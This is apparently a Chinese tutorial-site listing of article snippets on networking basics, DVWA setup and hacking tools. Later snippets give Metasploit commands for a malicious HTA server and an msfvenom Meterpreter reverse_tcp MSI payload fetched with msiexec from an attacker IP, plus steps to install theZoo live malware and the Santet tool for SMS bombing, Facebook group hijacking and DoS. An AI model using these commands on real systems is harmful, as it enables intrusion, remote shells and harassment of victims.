2K+ 浏览量
在使用数据报的数据包交换网络中,数据报是包含足够报头信息的数据包,以便所有中间交换设备可以将其单独路由到目的地。这些网络被称为数据报网络,因为通信是通过数据报进行的。路由原理在数据报网络中,即使属于同一消息,每个数据包也独立地从源路由到目的地。不会为各个数据包预先分配资源或信道。由于数据报被视为独立的单元,因此不会为数据传输固定专用路径。每个数据报由中间路由器路由... 阅读更多
15K+ 浏览量
在电信中,存储转发分组交换是一种技术,其中数据包在转发到下一个节点之前存储在每个中间节点中。中间节点在传输前检查数据包是否无错误,从而确保数据包的完整性。通常,网络层在使用存储转发分组交换的环境中运行。工作原理发送数据包的节点将其传递给最近的节点,即路由器。数据包存储在路由器中,直到它完全到达并验证其校验和以进行错误检测。... 阅读更多
40K+ 浏览量
网络层或 OSI(开放系统互连)模型的第 3 层负责跨多个跳点或链路将数据包从源传递到目的地。它是处理端到端传输的最低层。负责设计此层的设计人员需要解决某些问题。这些问题包括提供给上层层的服务以及层的内部设计。设计问题可以在以下四个方面详细说明:存储转发分组交换传输层服务提供面向连接的服务提供无连接... 阅读更多
20K+ 浏览量
OSI(开放系统互连)模型的网络层或第 3 层的主要功能是跨多个跳点或链路将数据包从源传递到目的地。它还控制子网的操作。这些功能如下所述:当要发送数据时,网络层接受来自上层传输层的数据,将其划分为数据包并封装,然后将其发送到数据链路层。接收数据时执行反向过程。网络层负责将数据包从源主机路由到目标主机。该... 阅读更多
757 浏览量
网络层或 OSI(开放系统互连)模型的第 3 层负责跨多个跳点或节点将数据包从源传递到目的地。它控制子网的操作。网络层在 OSI 模型中的位置如下图所示:网络层的功能网络层负责将数据包从源主机路由到目标主机。路由可以基于很少更改的静态表;或者,它们可以根据网络状况自动更新。许多网络被划分为子网络或子网。... 阅读更多
275 浏览量
您将学习如何使用 Docker 以简单的步骤配置易受攻击的 Web 应用程序 (DVWA)。Docker 是一个第三方工具,用于创建隔离的环境以执行任何应用程序。这些应用程序使用容器运行。这些容器之所以独特,是因为它们将应用程序的所有依赖项整合到一个软件包中并进行部署。执行以下命令进行安装和配置:apt updateapt install docker.iosystemctl start dockersystemctl enable docker在 Docker 上配置 DVWADamn Vulnerable Web Application (DVWA) 是一个非常容易受到攻击的 PHP/MySQL Web 应用程序。其主要目标是作为... 阅读更多
1K+ 浏览量
theZoo 允许研究恶意软件,并使对恶意软件分析感兴趣的人能够访问实时恶意软件,分析其操作方式,甚至可能使高级和精通技术的人能够在其自身环境中阻止特定恶意软件。git clone https://github.com/ytisf/theZoocd theZoopip install --user -r requirements.txtpython theZoo.py我建议在没有互联网连接(或必须使用内部虚拟网络)且没有来宾添加或任何等效项的虚拟机中运行它们。其中一些是蠕虫,会自动尝试传播。不受约束地运行它们意味着您将感染自己或他人... 阅读更多
负责运行我们可以使用 JavaScript 或 VBScript 运行的 HTA(HTML 应用程序)文件的 Windows OS 实用程序。您可以使用 Microsoft MSHTA.exe 工具解释这些文件。Metasploit 包含“HTA Web Server”模块,该模块生成恶意 hta 文件。此模块托管一个 HTML 应用程序 (HTA),当打开时,它将通过 Powershell 运行有效负载。恶意 HTA 文件在 Kali linux 中打开 metasploit 并执行以下命令以生成恶意 HTA 文件:use exploit/windows/misc/hta_serverset srvhost 192.168.1.109set lhost 192.168.1.109exploit现在通过受害者机器上的 mshta.exe 运行目标机器上的恶意代码以获取 Meterpreter 会话。阅读更多
912 浏览量
本文阐述了如何使用 Santet 工具进行黑客攻击,该工具在一个软件包中内置了多种不同的攻击。它允许您创建有效负载,劫持 Facebook 群组,执行短信轰炸和短信欺骗攻击,最后执行拒绝服务攻击。请按照以下说明了解如何安装 Santet 并进一步使用它。打开您的 Kali 机器,打开终端并输入 git clonehttps://github.com/Gameye98/santet-online现在使用 cd 命令将当前目录更改为 santet - cd santet-online现在通过执行此命令为 santet.py 文件授予执行权限 - chmod -x santet.py,现在运行 python santet.py 如下所示:如果一切... 阅读更多
Windows OS 预装了 Windows 安装程序引擎,MSI 包使用该引擎安装应用程序。解释包并安装产品的可执行程序是 Msiexec.exe。通过 msfvenom 启动 msiexec 攻击让我们使用 Windows Meterpreter 有效负载生成 MSI 包文件 (1.msi),如下所示:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi在目标端,当受害者使用以下实用程序在远程机器上执行 1.msi 文件时:msiexec /q /i http://192.168.1.109/1.msi攻击者通过启动 multi/handler 作为侦听器来获取受害者机器的反向 Shell。use exploit/multi/handlerset pyaload windows/meterpreter/reverse_tcpset lhost 192.168.1.109exploit阅读更多